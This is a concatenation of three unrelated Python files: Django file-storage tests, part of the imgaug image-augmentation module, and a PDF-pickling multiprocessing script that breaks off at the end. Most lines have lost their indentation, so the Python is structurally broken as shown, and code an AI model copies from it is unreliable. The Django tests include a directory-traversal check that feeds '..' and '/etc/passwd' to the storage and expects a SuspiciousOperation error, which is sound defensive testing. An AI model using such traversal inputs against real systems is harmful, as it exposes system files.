class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
        get_storage_class raises an error if the requested import doesn't exist.
"""
with six.assertRaisesRegex(self, ImportError, "No module named '?storage'?"):
get_storage_class('storage.NonExistingStorage')
def test_get_nonexisting_storage_class(self):
"""
        get_storage_class raises an error if the requested class doesn't exist.
"""
self.assertRaises(ImportError, get_storage_class,
'django.core.files.storage.NonExistingStorage')
def test_get_nonexisting_storage_module(self):
"""
        get_storage_class raises an error if the requested module doesn't exist.
"""
# Error message may or may not be the fully qualified path.
with six.assertRaisesRegex(self, ImportError,
"No module named '?(django.core.files.)?non_existing_storage'?"):
get_storage_class(
'django.core.files.non_existing_storage.NonExistingStorage')
class FileStorageTests(unittest.TestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir,
base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
    def test_empty_location(self):
        """
        An empty location falls back to the current working directory.
        """
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, upath(os.getcwd()))
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def test_file_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
atime = self.storage.accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(
os.path.getatime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.accessed_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_created_time(self):
"""
File storage returns a Datetime object for the creation time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
ctime = self.storage.created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(
os.path.getctime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.created_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_modified_time(self):
"""
File storage returns a Datetime object for the last modified time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
mtime = self.storage.modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(
os.path.getmtime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.modified_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file',
ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name),
os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'),
'%s%s' % (self.storage.base_url, 'test.file'))
        # should encode special chars except ~!*()'
        # like the encodeURIComponent() JavaScript function does
self.assertEqual(self.storage.url(r"""~!*()'@#$%^&*abc`+ =.file"""),
"""/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file""")
        # should translate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""),
"""/test_media_url/a/b/c.file""")
self.storage.base_url = None
self.assertRaises(ValueError, self.storage.url, 'test.file')
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
self.storage.save('storage_test_1', ContentFile('custom content'))
self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), set(['storage_dir_1']))
self.assertEqual(set(files),
set(['storage_test_1', 'storage_test_2']))
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
self.assertRaises(SuspiciousOperation, self.storage.exists, '..')
self.assertRaises(SuspiciousOperation, self.storage.exists, '/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = other_temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case),
other_temp_storage.path(mixed_case))
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path)
raise OSError(errno.EEXIST, 'simulated EEXIST')
elif path == os.path.join(self.temp_dir, 'error'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file',
ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file',
ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Check that OSErrors aside from EEXIST are still raised.
self.assertRaises(OSError,
self.storage.save, 'error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise OSError(errno.ENOENT, 'simulated ENOENT')
elif path == os.path.join(self.temp_dir, 'error.file'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
            self.assertFalse(self.storage.exists('raced.file'))
# Check that OSErrors aside from ENOENT are still raised.
self.storage.save('error.file', ContentFile('delete with error'))
self.assertRaises(OSError, self.storage.delete, 'error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise IOError
f1.chunks = failing_chunks
with self.assertRaises(IOError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
class CustomStorage(FileSystemStorage):
def get_available_name(self, name):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class FileFieldStorageTests(unittest.TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def test_files(self):
# Attempting to access a FileField from the class raises a descriptive
# error
self.assertRaises(AttributeError, lambda: Storage.normal)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
self.assertRaises(ValueError, lambda: obj1.normal.size)
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertFalse("assignment.txt" in files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertEqual(obj2.normal.name, "tests/django_test_1.txt")
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertEqual(obj2.normal.name, "tests/django_test_2.txt")
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_file_numbering(self):
# Multiple files with the same name get _N appended to them.
objs = [Storage() for i in range(3)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
self.assertEqual(
[o.normal.name for o in objs],
["tests/multiple_files.txt", "tests/multiple_files_1.txt", "tests/multiple_files_2.txt"]
)
for o in objs:
o.delete()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "./django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = six.StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super(ContentFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
self.assertTrue(self.storage.exists('conflict'))
self.assertTrue(self.storage.exists('conflict_1'))
self.storage.delete('conflict')
self.storage.delete('conflict_1')
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test_1')))
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test')))
self.assertTrue(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test_1')))
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
Test that ContentFile can be saved correctly with the filesystem storage,
both if it was initialized with string or unicode content"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
urls = 'file_storage.urls'
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib2_urlopen(self):
"""
Test the File storage API with a file like object coming from urllib2.urlopen()
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
imgaug.py
|
from __future__ import print_function, division, absolute_import
from abc import ABCMeta, abstractmethod
import random
import numpy as np
import copy
import numbers
import cv2
import math
from scipy import misc
import six
import six.moves as sm
"""
try:
xrange
except NameError: # python3
xrange = range
"""
ALL = "ALL"
# We instantiate a current/global random state here once.
# One can also call np.random, but that is (in contrast to np.random.RandomState)
# a module and hence cannot be copied via deepcopy. That's why we use RandomState
# here (and in all augmenters) instead of np.random.
CURRENT_RANDOM_STATE = np.random.RandomState(42)
def is_np_array(val):
return isinstance(val, (np.ndarray, np.generic))
def is_single_integer(val):
return isinstance(val, numbers.Integral)
def is_single_float(val):
return isinstance(val, numbers.Real) and not is_single_integer(val)
def is_single_number(val):
return is_single_integer(val) or is_single_float(val)
def is_iterable(val):
return isinstance(val, (tuple, list))
def is_string(val):
return isinstance(val, six.string_types)
def is_integer_array(val):
return issubclass(val.dtype.type, np.integer)
def current_random_state():
return CURRENT_RANDOM_STATE
def new_random_state(seed=None, fully_random=False):
if seed is None:
if not fully_random:
# sample manually a seed instead of just RandomState(),
# because the latter one
# is way slower.
seed = CURRENT_RANDOM_STATE.randint(0, 10**6, 1)[0]
return np.random.RandomState(seed)
def dummy_random_state():
return np.random.RandomState(1)
def copy_random_state(random_state, force_copy=False):
if random_state == np.random and not force_copy:
return random_state
else:
rs_copy = dummy_random_state()
orig_state = random_state.get_state()
rs_copy.set_state(orig_state)
return rs_copy
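# Illustrative sketch (not part of the original module): copying a random state as
# described above yields an independent generator that reproduces the same values.
#
# rs = new_random_state(1234)
# rs_copy = copy_random_state(rs, force_copy=True)
# assert rs.randint(0, 10**6) == rs_copy.randint(0, 10**6)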
# TODO
# def from_json(json_str):
# pass
def imresize_many_images(images, sizes=None, interpolation=None):
s = images.shape
assert len(s) == 4, s
nb_images = s[0]
im_height, im_width = s[1], s[2]
nb_channels = s[3]
height, width = sizes[0], sizes[1]
if height == im_height and width == im_width:
return np.copy(images)
ip = interpolation
assert ip is None or ip in ["nearest", "linear", "area", "cubic", cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_AREA, cv2.INTER_CUBIC]
if ip is None:
if height > im_height or width > im_width:
ip = cv2.INTER_AREA
else:
ip = cv2.INTER_LINEAR
elif ip in ["nearest", cv2.INTER_NEAREST]:
ip = cv2.INTER_NEAREST
elif ip in ["linear", cv2.INTER_LINEAR]:
ip = cv2.INTER_LINEAR
elif ip in ["area", cv2.INTER_AREA]:
ip = cv2.INTER_AREA
elif ip in ["cubic", cv2.INTER_CUBIC]:
ip = cv2.INTER_CUBIC
else:
raise Exception("Invalid interpolation order")
result = np.zeros((nb_images, height, width, nb_channels), dtype=np.uint8)
for img_idx in sm.xrange(nb_images):
result_img = cv2.resize(images[img_idx], (width, height), interpolation=ip)
if len(result_img.shape) == 2:
result_img = result_img[:, :, np.newaxis]
result[img_idx] = result_img
return result
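# Illustrative usage sketch (relies only on the numpy import above): resize a batch
# of (N, H, W, C) uint8 images to 32x32 with the automatic interpolation choice.
#
# batch = np.zeros((2, 16, 16, 3), dtype=np.uint8)
# resized = imresize_many_images(batch, (32, 32))
# assert resized.shape == (2, 32, 32, 3)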
def imresize_single_image(image, sizes, interpolation=None):
grayscale = False
if len(image.shape) == 2:
grayscale = True
image = image[:, :, np.newaxis]
assert len(image.shape) == 3, image.shape
rs = imresize_many_images(image[np.newaxis, :, :, :], sizes, interpolation=interpolation)
if grayscale:
return np.squeeze(rs[0, :, :, 0])
else:
return rs[0, ...]
def draw_grid(images, rows=None, cols=None):
if is_np_array(images):
assert len(images.shape) == 4
else:
assert is_iterable(images)
nb_images = len(images)
cell_height = max([image.shape[0] for image in images])
cell_width = max([image.shape[1] for image in images])
channels = set([image.shape[2] for image in images])
assert len(channels) == 1
nb_channels = list(channels)[0]
if rows is None and cols is None:
rows = cols = int(math.ceil(math.sqrt(nb_images)))
elif rows is not None:
cols = int(math.ceil(nb_images / rows))
elif cols is not None:
rows = int(math.ceil(nb_images / cols))
assert rows * cols >= nb_images
width = cell_width * cols
height = cell_height * rows
grid = np.zeros((height, width, nb_channels))
cell_idx = 0
for row_idx in sm.xrange(rows):
for col_idx in sm.xrange(cols):
if cell_idx < nb_images:
image = images[cell_idx]
cell_y1 = cell_height * row_idx
cell_y2 = cell_y1 + image.shape[0]
cell_x1 = cell_width * col_idx
cell_x2 = cell_x1 + image.shape[1]
grid[cell_y1:cell_y2, cell_x1:cell_x2, :] = image
cell_idx += 1
return grid
def show_grid(images, rows=None, cols=None):
grid = draw_grid(images, rows=rows, cols=cols)
misc.imshow(grid)
class HooksImages(object):
"""
# TODO
"""
def __init__(self, activator=None, propagator=None, preprocessor=None, postprocessor=None):
self.activator = activator
self.propagator = propagator
self.preprocessor = preprocessor
self.postprocessor = postprocessor
def is_activated(self, images, augmenter, parents, default):
if self.activator is None:
return default
else:
return self.activator(images, augmenter, parents, default)
# TODO is a propagating hook necessary? seems to be covered by activated
# hook already
def is_propagating(self, images, augmenter, parents, default):
if self.propagator is None:
return default
else:
return self.propagator(images, augmenter, parents, default)
def preprocess(self, images, augmenter, parents):
if self.preprocessor is None:
return images
else:
return self.preprocessor(images, augmenter, parents)
def postprocess(self, images, augmenter, parents):
if self.postprocessor is None:
return images
else:
return self.postprocessor(images, augmenter, parents)
class HooksKeypoints(HooksImages):
pass
class Keypoint(object):
"""
# TODO
"""
def __init__(self, x, y):
# these checks are currently removed because they are very slow for some
# reason
#assert is_single_integer(x), type(x)
#assert is_single_integer(y), type(y)
self.x = x
self.y = y
def project(self, from_shape, to_shape):
if from_shape[0:2] == to_shape[0:2]:
return Keypoint(x=self.x, y=self.y)
else:
from_height, from_width = from_shape[0:2]
to_height, to_width = to_shape[0:2]
x = int(round((self.x / from_width) * to_width))
y = int(round((self.y / from_height) * to_height))
return Keypoint(x=x, y=y)
def shift(self, x, y):
return Keypoint(self.x + x, self.y + y)
def __repr__(self):
return self.__str__()
def __str__(self):
return "Keypoint(x=%d, y=%d)" % (self.x, self.y)
class KeypointsOnImage(object):
def __init__(self, keypoints, shape):
self.keypoints = keypoints
if is_np_array(shape):
self.shape = shape.shape
else:
assert isinstance(shape, (tuple, list))
self.shape = tuple(shape)
@property
def height(self):
return self.shape[0]
@property
def width(self):
return self.shape[1]
def on(self, image):
if is_np_array(image):
shape = image.shape
else:
shape = image
if shape[0:2] == self.shape[0:2]:
return self.deepcopy()
else:
keypoints = [kp.project(self.shape, shape) for kp in self.keypoints]
return KeypointsOnImage(keypoints, shape)
def draw_on_image(self, image, color=[0, 255, 0], size=3, copy=True, raise_if_out_of_image=False):
if copy:
image = np.copy(image)
height, width = image.shape[0:2]
for keypoint in self.keypoints:
y, x = keypoint.y, keypoint.x
if 0 <= y < height and 0 <= x < width:
x1 = max(x - size//2, 0)
x2 = min(x + 1 + size//2, width - 1)
y1 = max(y - size//2, 0)
y2 = min(y + 1 + size//2, height - 1)
image[y1:y2, x1:x2] = color
else:
if raise_if_out_of_image:
raise Exception("Cannot draw keypoint x=%d, y=%d on image with shape %s." % (y, x, image.shape))
return image
def shift(self, x, y):
keypoints = [keypoint.shift(x=x, y=y) for keypoint in self.keypoints]
return KeypointsOnImage(keypoints, self.shape)
def get_coords_array(self):
result = np.zeros((len(self.keypoints), 2), np.int32)
for i, keypoint in enumerate(self.keypoints):
result[i, 0] = keypoint.x
result[i, 1] = keypoint.y
return result
@staticmethod
def from_coords_array(coords, shape):
assert is_integer_array(coords), coords.dtype
keypoints = [Keypoint(x=coords[i, 0], y=coords[i, 1]) for i in sm.xrange(coords.shape[0])]
return KeypointsOnImage(keypoints, shape)
def to_keypoint_image(self):
assert len(self.keypoints) > 0
height, width = self.shape[0:2]
image = np.zeros((height, width, len(self.keypoints)), dtype=np.uint8)
for i, keypoint in enumerate(self.keypoints):
y = keypoint.y
x = keypoint.x
if 0 <= y < height and 0 <= x < width:
image[y, x, i] = 255
return image
@staticmethod
def from_keypoint_image(image, if_not_found_coords={"x": -1, "y": -1}, threshold=1):
assert len(image.shape) == 3
height, width, nb_keypoints = image.shape
drop_if_not_found = False
if if_not_found_coords is None:
drop_if_not_found = True
if_not_found_x = -1
if_not_found_y = -1
elif isinstance(if_not_found_coords, (tuple, list)):
assert len(if_not_found_coords) == 2
if_not_found_x = if_not_found_coords[0]
if_not_found_y = if_not_found_coords[1]
elif isinstance(if_not_found_coords, dict):
if_not_found_x = if_not_found_coords["x"]
if_not_found_y = if_not_found_coords["y"]
else:
raise Exception("Expected if_not_found_coords to be None or tuple or list or dict, got %s." % (type(if_not_found_coords),))
keypoints = []
for i in sm.xrange(nb_keypoints):
maxidx_flat = np.argmax(image[..., i])
maxidx_ndim = np.unravel_index(maxidx_flat, (height, width))
found = (image[maxidx_ndim[0], maxidx_ndim[1], i] >= threshold)
if found:
keypoints.append(Keypoint(x=maxidx_ndim[1], y=maxidx_ndim[0]))
else:
if drop_if_not_found:
pass # dont add the keypoint to the result list, i.e. drop it
else:
keypoints.append(Keypoint(x=if_not_found_x, y=if_not_found_y))
return KeypointsOnImage(keypoints, shape=(height, width))
def copy(self):
return copy.copy(self)
def deepcopy(self):
# for some reason deepcopy is way slower here than manual copy
#return copy.deepcopy(self)
kps = [Keypoint(x=kp.x, y=kp.y) for kp in self.keypoints]
return KeypointsOnImage(kps, tuple(self.shape))
def __repr__(self):
return self.__str__()
def __str__(self):
#print(type(self.keypoints), type(self.shape))
return "KeypointOnImage(%s, shape=%s)" % (str(self.keypoints), self.shape)
# TODO
"""
class BackgroundAugmenter(object):
def __init__(self, image_source, augmenter, maxlen, nb_workers=1):
self.augmenter = augmenter
self.maxlen = maxlen
self.result_queue = multiprocessing.Queue(maxlen)
self.batch_workers = []
for i in range(nb_workers):
worker = multiprocessing.Process(target=self._augment, args=(image_source, augmenter, self.result_queue))
worker.daemon = True
worker.start()
self.batch_workers.append(worker)
def join(self):
for worker in self.batch_workers:
worker.join()
def get_batch(self):
return self.result_queue.get()
def _augment(self, image_source, augmenter, result_queue):
batch = next(image_source)
self.result_queue.put(augmenter.transform(batch))
"""
|
pickles_main_mp.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 2 08:59:30 2020
@author: T1Sousan
"""
# Libraries
from io import StringIO
import time
from bs4 import BeautifulSoup
from tika import parser
import pandas as pd
from collections import Counter
import sys
import multiprocessing
sys.path.insert(0, 'H:/GitHub/Extract-Tables-With-Titles')
import pickles_functions_mp as pf
import glob
#
if __name__ == "__main__":
#Get unique project names
#Open Index 2 for each PDF
# #updated on Feb 27 post line 3 addition
# index2_path = 'F:/Environmental Baseline Data/Version 4 - Final/Indices/Index 2 - PDFs for Major Projects with ESAs.csv'
# index2 = pd.read_csv(index2_path)
# index2['Application title short'].unique()
#
# subset_list_pdf = list(index2['DataID_pdf'])
subset_list_pdf_full = ['F:/Environmental Baseline Data/Version 4 - Final/PDF/' + x.split('\\')[-1] for x in glob.glob('F:/Environmental Baseline Data/Version 4 - Final/PDF/*.pdf')]
#a = get_argument(subset_list_pdf_full)
starttime = time.time()
processes = []
for i in subset_list_pdf_full:
try:
p = multiprocessing.Process(target= pf.get_pickles_, args=(i,))
processes.append(p)
p.start()
except:
print("file {} is not present in the folder".format(i.split('/')[-1]))
continue
for process in processes:
process.join()
print('That took {} seconds'.format(time.time() - starttime))
if __name__ == "__main__":
subset_list_pdf_full = ['F:/Environmental Baseline Data/Version 4 - Final/PDF/' + x.split('\\')[-1] for x in glob.glob('F:/Environmental Baseline Data/Version 4 - Final/PDF/*.pdf')]
#a = get_argument(subset_list_pdf_full)
starttime = time.time()
processes = []
for i in subset_list_pdf_full:
try:
pf.rotate_pdf(i)
except Exception:
print(f'{i} failed')
pass
print('That took {} seconds'.format(time.time() - starttime))
########################################################################################################################################
if __name__ == '__main__':
# list of full paths to pdfs
subset_list_pdf_full = ['F:/Environmental Baseline Data/Version 4 - Final/PDF/'
+ x.split('\\')[-1] for x in glob.glob
('F:/Environmental Baseline Data/Version 4 - Final/PDF/*.pdf')]
subset_list_pdf_full = subset_list_pdf_full[0:40]
# Directory where the output pickle files are saved
path = 'H:/GitHub/tmp/'
# prepare arguments for multiprocessing
args = pf.get_argument(subset_list_pdf_full, path)
# timing the process-start
starttime = time.time()
# sequential
for arg in args:
try:
pf.pickle_pdf_xml(arg)
except Exception:
print(f'{arg} failed')
pass
# multiprocessing
pool = multiprocessing.Pool()
